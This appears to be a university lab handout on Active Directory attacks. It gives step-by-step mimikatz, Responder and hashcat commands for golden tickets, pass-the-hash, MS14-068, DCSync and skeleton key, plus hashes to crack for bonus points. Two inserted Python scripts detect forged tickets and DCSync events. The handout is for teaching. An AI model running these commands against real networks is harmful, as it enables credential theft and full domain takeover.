CSEC 388/488

 

NAME:____________________________________

 

Active Directory Attacks (Lab #5)

 

75 Points

Instructions: Read and complete the lab as stated (yes, read the whole thing).  Submit all required screenshots and questions. Commands you need to run are highlighted in BLUE. Commands you need to replace are highlighted in PURPLE. Required screenshots are underlined in GREEN. You are only authorized to perform actions within the lab environment.  Under no circumstances are you allowed to probe, scan, ping, or send any data to any targets other than those listed in the lab.

Deliverables: You do not need to submit screenshots, unless specifically asked for.  All questions are numbered and bolded.  Submit in a SEPARATE word document with all questions, screenshots, and your full name to D2L. Note: You must also include any screenshots asked for as part of the lab.

Estimated Time: ~ 6-10 hours

Note: Plagiarism or cheating will result in a 0 for the assignment and potentially failure for the course.  Answers are expected to be written in a detailed, professional manner.  Answers should be submitted in a separate word (.docx) file. Failure to do any of the above will result in a point reduction.

 

Required Materials: Windows 2003, Windows 10

 

Net-NTLM cracking

  1. Login to your Kali box and open a terminal.
  2. Responder is a tool that will capture Net-NTLM hashes that we can attempt to crack offline. The syntax for the tool is responder -I [interface]. Run this command using the Kali interface connected to the 10.12.0.0/24 network.
  3. Note that NBT-NS (NetBIOS Name Service) is set to poison the response. This is essentially Kali pretending to be the requested service.
  4. Now we will simulate capturing credentials. Login to your Windows 10 box as the gibson\student[your_student_#] user (the password can be found in your password cracking steps from the last lab).

Note: this is NOT the adminStudent account

  5. Run ncpa.cpl (Network Connections) either from search or cmd.exe and disable the Ethernet 1 interface (use the .\student:CSEC388password credentials to achieve this).
  6. Open an Explorer window and attempt to connect to a file share whose name is your student number.

Note: Do NOT enter credentials when prompted.  The hash will be automatically sent to Responder.

  7. Return to the Kali terminal. You should see a captured NTLMv2 response. Take a complete screenshot of this response as well as the poisoned answer it responded to, including the entire hash (examples of both are shown below).
  8. Open a new terminal. Copy the hash (everything in orange on the NTLMv2-SSP line) to a file called hashes.txt. Note: You can view all captured hashes at /usr/share/responder/logs/
  9. In the last lab, you used John and Cain to crack passwords. Now we are going to use a much more advanced password cracking tool, Hashcat.  Hashcat supports over 300 hash varieties for cracking, as well as the ability to utilize GPU cores, which is more efficient for cracking passwords.
  10. Run the following to crack the password: hashcat -m 5600 -a 0 hashes.txt /usr/share/wordlists/wfuzz/general/medium.txt
  11. You should see a status of Cracked after a minute or so. Take a screenshot showing this status as well as the cracked password.

1) Include the screenshots asked for above.  What type of hash did you crack?  Explain the options used in the hashcat command. (15 pts)

 

Golden Ticket

  1. Login to your Windows 10 box as the gibson\student[your_student_#] user (pass: gibson).
  2. Open up cmd (not admin, as the logged in user, student[your_student_#]).
  3. Run whoami to confirm you are running with user privileges. Attempt to visit the c$ share on the domain controller by running ipconfig && date /t && time /t && whoami && pushd \\gibson2003ad\c$.  Take a screenshot showing the output of all the previous commands.  You should get an access denied message.  Why do you think that is?
  4. Run klist to view your current Kerberos tickets. Note that the expiration date for all tickets is 7 days.
  5. We need to gather some information before we can run our attack. Run net group "domain admins" /domain and choose a target account to impersonate (choose the account matching your student #).  Then run whoami /user and note the SID (minus the last 4 digits, which are the account's RID).  From the lab #4 secretsdump output, locate the NTLM hash of the krbtgt account.
  6. Open up a 2nd cmd with the local admin account (student). Navigate to your x64 version of mimikatz.exe (C:\CSEC388-Tools) and run it from the CLI or GUI (shift + right click to run as a different user).

Note: This does NOT mean to log out and log back in as student.  You should be logged in as your student# domain account, running the process cmd.exe as student.

  7. Create a golden ticket using mimikatz and inject the golden ticket using pass the ticket. Take a screenshot of your command used and the output.
     Command Example (this will not work as written):

     kerberos::golden /admin:Bob /domain:c137.local /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi /ptt

       i. /admin = domain admin from step 5
      ii. /sid = SID from step 5
     iii. /krbtgt = krbtgt NTLM hash from the lab 4 domain controller hashdump (secretsdump output)

  8. Run kerberos::list to view your new ticket. Note that the end date is 10 years from now!  This can be a good sign of a forged krbtgt ticket.
  9. Run misc::cmd to open a cmd shell with our new ticket.
  10. Run klist to ensure you see your new ticket in your new command shell.
  11. Run ipconfig && date /t && time /t && whoami && pushd \\gibson2003ad\c$ && dir and take a screenshot. List the contents of the directory and take a screenshot.
  12. Return to the first cmd shell (the one running as your student# domain account) and run klist. This will show your current Kerberos tickets.
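The step above points out that a forged krbtgt ticket shows an end date 10 years out, while legitimate tickets in this lab expire within 7 days. The following script turns that observation into a check a defender can run over the text that the Windows klist command prints. It is an added example, not part of the lab handout or of mimikatz; the klist output it parses is constructed for the example, and the 7-day limit is an assumption taken from the lab text (use your own domain's Kerberos policy in practice).

```python
"""Flag cached Kerberos tickets whose lifetime exceeds the domain's policy.

Added example for the Golden Ticket section of this lab (not from the handout).
It parses klist-style output and reports any ticket whose End Time lies more
than MAX_TICKET_LIFETIME after its Start Time, which is exactly what a forged
krbtgt ticket with a 10-year end date looks like.
"""
from datetime import datetime, timedelta
import re

# Assumption: the lab states that tickets here expire within 7 days.
MAX_TICKET_LIFETIME = timedelta(days=7)

# Constructed sample in the layout klist uses on Windows 10. Ticket #1 mimics
# a forged krbtgt ticket: its end time is 10 years after its start time.
SAMPLE_KLIST = """\
Current LogonId is 0:0x3e7b1

Cached Tickets: (2)

#0>     Client: student1 @ GIBSON.LOCAL
        Server: krbtgt/GIBSON.LOCAL @ GIBSON.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Start Time: 3/1/2018 9:00:00 (local)
        End Time:   3/1/2018 19:00:00 (local)
        Renew Time: 3/8/2018 9:00:00 (local)

#1>     Client: Administrator @ GIBSON.LOCAL
        Server: krbtgt/GIBSON.LOCAL @ GIBSON.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Start Time: 3/1/2018 9:05:00 (local)
        End Time:   2/27/2028 9:05:00 (local)
        Renew Time: 2/27/2028 9:05:00 (local)
"""

TIME_FMT = "%m/%d/%Y %H:%M:%S"
FIELD = re.compile(r"^\s*(Client|Server|Start Time|End Time):\s*(.+?)\s*(?:\(local\))?\s*$")


def parse_klist(text):
    """Return one dict per cached ticket with Client, Server, Start Time and
    End Time (the times as datetime objects)."""
    tickets = []
    current = None
    for line in text.splitlines():
        if re.match(r"^#\d+>", line):
            current = {}
            tickets.append(current)
            line = line.split(">", 1)[1]      # keep the 'Client: ...' part
        if current is None:
            continue                           # header lines before the first ticket
        m = FIELD.match(line)
        if not m:
            continue
        key, value = m.group(1), m.group(2)
        if key in ("Start Time", "End Time"):
            value = datetime.strptime(value, TIME_FMT)
        current[key] = value
    return tickets


def suspicious_tickets(text, max_lifetime=MAX_TICKET_LIFETIME):
    """Return (client, server, lifetime) for every ticket whose validity
    window is longer than max_lifetime."""
    flagged = []
    for t in parse_klist(text):
        lifetime = t["End Time"] - t["Start Time"]
        if lifetime > max_lifetime:
            flagged.append((t["Client"], t["Server"], lifetime))
    return flagged


if __name__ == "__main__":
    for client, server, lifetime in suspicious_tickets(SAMPLE_KLIST):
        print(f"SUSPICIOUS: {client} -> {server} valid for {lifetime.days} days")
```

Lifetime is only one signal: a ticket issued by the KDC can never exceed the policy maximum, so a longer window means the ticket did not come from the KDC. Feed the script real klist output (for example collected by an endpoint agent) and pair it with the Start Time check from the lab's klist step.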

2) Include screenshots asked for above.  Do you see your newly generated ticket from step 8 in step 10 and step 12? If not, why don’t you? Do you think it is a good idea to impersonate a member of the Domain Admins group? Why? (15 pts)

 

 

Pass the Hash

  1. Reboot the Windows 10 VM to clear out any existing sessions. Logon with the gibson\student[your_student_#] user.

Note: this is NOT the adminStudent account

  2. Open up cmd and attempt to visit the c$ share on the domain controller by running ipconfig && date /t && time /t && whoami && pushd \\gibson2003ad\c$ to ensure that you no longer have access.   Take a screenshot.
  3. We need to gather some information before we can run our attack. Locate the adminStudent NTLM hash from lab 4.
  4. Open up a 2nd cmd with the local admin account (student). Navigate to your x64 version of mimikatz.exe and run it.
  5. Pass the hash using mimikatz. Take a screenshot of the command used and output.
     1. Elevate privileges: privilege::debug
     2. Command Example (this will not work as written):

        sekurlsa::pth /user:adminStudent[your_student_#] /domain:c137.local /ntlm:cc126155b0b1b31a4fa2b55e2f0aa790

  6. A new cmd shell will open automatically. Run ipconfig && date /t && time /t && whoami && pushd \\gibson2003ad\c$ && dir and take a screenshot.

 

3) Include the screenshots asked for above.  Why do you think this attack works without a user password? (15 pts)

 

MS14-068

  1. Reboot the Windows 10 VM to clear out any existing sessions. Logon with the student[your_student_#] domain user.
  2. Open up cmd and attempt to visit the c$ share on the domain controller by running ipconfig && date /t && time /t && whoami && pushd \\gibson2003ad\c$ to ensure that you no longer have access.   Take a screenshot.
  3. We need to gather some information before we can run our attack. Find the student# domain account SID using commands from earlier in the lab.
  4. Navigate to the CSEC388-Tools folder. Using cmd, run ms14-068.exe. Fill in the options using the student user and the other information you gathered.  This will modify our existing TGT to give us added permissions and save it to the local directory.  Take a screenshot of your command and the generated ticket file (the output of the command).

Note: You will need the full student# user SID.  You should also use domain names, not IP addresses.

  5. We now need to use mimikatz to inject our fake ticket into memory. Navigate to your x64 version of mimikatz.exe and run it.
  6. Inject the MS14-068 ticket using mimikatz. Take a screenshot of your successful injection of the forged ticket.
     1. Clear old Kerberos tickets: kerberos::purge
     2. Inject ticket: kerberos::ptc path_to_.ccache
  7. Run misc::cmd to open a cmd shell with the new ticket.
  8. Run ipconfig && date /t && time /t && whoami && pushd \\gibson2003ad\c$ && dir and take a screenshot.

4) Include the screenshots asked for above.  Consider the risk of this type of vulnerability against the other attacks performed in the lab.  Where would you rate this one and why?  (15 pts)

 

DCSync

  1. Reboot the Windows 10 VM to clear out any existing sessions. Logon with the student# domain user.
  2. Open up cmd as a Domain Administrator (adminStudent[your_student_#]) (this is NOT student). Navigate to your x64 version of mimikatz.exe and run it.
  3. Elevate to a system level context by running token::elevate
  4. Run the command lsadump::dcsync /user:administrator and screenshot your command and results.
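The lsadump::dcsync command above asks the domain controller to replicate account secrets the way another domain controller would. A domain controller that audits Directory Service Access records that request as Event ID 4662 with AccessMask 0x100 (control access) and the replication extended rights listed in the Properties field, so the defender's check is simple: only domain controllers should ever exercise those rights. The script below is an added example, not part of the lab or of mimikatz; the events it scans are constructed to mirror that event shape, and the set of known DC computer accounts is an assumption (the lab's 2003 AD server is used as the placeholder).

```python
"""Flag DCSync-style replication requests in Windows Security events.

Added example for the DCSync section of this lab (not from the handout).
Each event is a dict holding the 4662 fields a log pipeline would extract.
The replication-right GUIDs are the well-known Active Directory values; the
events and the DC account list are constructed for this example.
"""
import re

# Extended-rights GUIDs that Active Directory replication (and DCSync) uses.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Assumption: computer accounts of the domain controllers that may replicate.
KNOWN_DC_ACCOUNTS = {"GIBSON2003AD$"}

GUID_RE = re.compile(r"\{?([0-9a-fA-F-]{36})\}?")

# Constructed sample events shaped like extracted 4662 event data.
SAMPLE_EVENTS = [
    {   # normal replication between domain controllers
        "EventID": 4662, "SubjectUserName": "GIBSON2003AD$",
        "SubjectDomainName": "GIBSON", "AccessMask": "0x100",
        "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                      "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # a user account pulling replication data: DCSync behaviour
        "EventID": 4662, "SubjectUserName": "adminStudent1",
        "SubjectDomainName": "GIBSON", "AccessMask": "0x100",
        "Properties": "{1131F6AA-9C07-11D1-F79F-00C04FC2DCD2} "
                      "{1131F6AD-9C07-11D1-F79F-00C04FC2DCD2}",
    },
    {   # control access on an unrelated, non-replication GUID: ignored
        "EventID": 4662, "SubjectUserName": "student1",
        "SubjectDomainName": "GIBSON", "AccessMask": "0x100",
        "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}",
    },
    {   # a different event id is skipped entirely
        "EventID": 4624, "SubjectUserName": "adminStudent1",
        "SubjectDomainName": "GIBSON", "AccessMask": "", "Properties": "",
    },
]


def replication_rights_in(properties):
    """Return the names of replication rights found in a 4662 Properties
    field; GUIDs may appear upper- or lower-case, braced or bare."""
    found = []
    for guid in GUID_RE.findall(properties):
        name = REPLICATION_RIGHTS.get(guid.lower())
        if name:
            found.append(name)
    return found


def find_dcsync(events, known_dcs=KNOWN_DC_ACCOUNTS):
    """Return (DOMAIN\\user, [rights]) for every 4662 control-access event in
    which an account that is not a known domain controller exercised a
    replication right."""
    dc_names = {d.upper() for d in known_dcs}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662 or ev.get("AccessMask") != "0x100":
            continue
        rights = replication_rights_in(ev.get("Properties", ""))
        if not rights:
            continue
        user = ev["SubjectUserName"]
        if user.upper() in dc_names:
            continue                      # replication by a DC is expected
        alerts.append((f"{ev['SubjectDomainName']}\\{user}", rights))
    return alerts


if __name__ == "__main__":
    for who, rights in find_dcsync(SAMPLE_EVENTS):
        print(f"ALERT possible DCSync by {who}: {', '.join(rights)}")
```

The allow-list is the part that needs care: Azure AD Connect and similar synchronization accounts also hold replication rights, so in a real domain they belong on the list, and the list itself should be reviewed whenever the rights are granted to a new principal.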

5) Include the screenshots asked for above.  What is the output of the command?  How could this be useful?  (7.5 pts)

 

 

Skeleton Key

  1. Research the skeleton key attack. Use mimikatz on your 2003 AD server to perform this attack. Login with the "skeleton key" on your Windows 10 box. Take a screenshot showing the commands run in mimikatz as well as a screenshot of you running the following command from your Windows 10 box from the gibson\student# domain account: whoami && net use y: \\gibson2003ad\c$ /user:GIBSON\adminStudent[your_student_#] your_skeleton_key_password && dir y:

Note: You will need to figure out how to get the mimikatz executable to the 2003 server.  You can login to the 2003 server and run mimikatz from there.

6) How does this attack work? (7.5 pts)

 

Bonus – Password Cracking

BONUS) Below is a list of various hash types.  Using any method you wish, attempt to crack them.  Provide the tools/commands used, as well as screenshot(s) showing the flags/options used and the cracked hashes (clear text passwords). Summarize the list of hashes:passwords you cracked as well.  Failure to provide this results in no bonus points given.

0-4 hashes = 7.5 pts

5-9 hashes = 15 pts

10-14 hashes = 22.5 pts

15-19 = 45 pts

20 = 60 pts

Ex: 12 hashes gets you 22.5 points.

23B3EFCAA559D0DBAAD3B435B51404EE

7A21990FCD3D759941E45C490F143D5F

674B182EB361CCBDAAD3B435B51404EE

31D6CFE0D16AE931B73C59D7E0C089C0

174a4c22861829c9c2265b23734e0dac

4c3879fef394fa5dce0037c197c70841

AAD3B435B51404EEAAD3B435B51404EE

0D719285D17BE1AD7F674595BA10AB49

0ca2eb5ed25e3a459c5014ae4718a7ee

DC56A7ECA67163D0C8574EC813FB485B

b60d0b4991fa67cea233a2a85d4a681d

30F2A11DEEE826635CC97F19214C0953

7969f9a0da577b74a180aba111569fb0

A9A3FDA9A22F142474B72137B58B7124

$1$rmayH6pZ$TCGEW7GMPAMZaAj.Xa6lP0

$5$0UEq8/8/iF6tpdp$EY7.WmzwL8kC3t6VvxeYbmeWOzgFKT2DbbPEoxM8Zg.

$6$VgkKz.9tcfThuF9m$zOp8YkX5sJDgPTpG/P/vt2ulwCuhKM67AqIhRZmMPNSWfGlz692akPa/8NV3vE1gOlLm/dOfuECiI9U187zqD/

$1$KIIP4v5t$Eg79.tkpCvIlrmS4aSUGP1

$5$yjC2.4sLjJc$73eJp8mxwX/ASZZfAUVeTWewaga9Z3YLMw6GUVbr4i8

$6$2YF2grK5esw5F$bzFSuef0ep65zhlss7NMfag94hfCGCbOW7bU1QzqsjzRKgQCPe804uL//So9IT03BPNGytx5iot62/4ANoj6p1

 

 

Time to Complete Lab:

 

© 2018, Ryan Haley. All rights reserved. AD Attacks Lab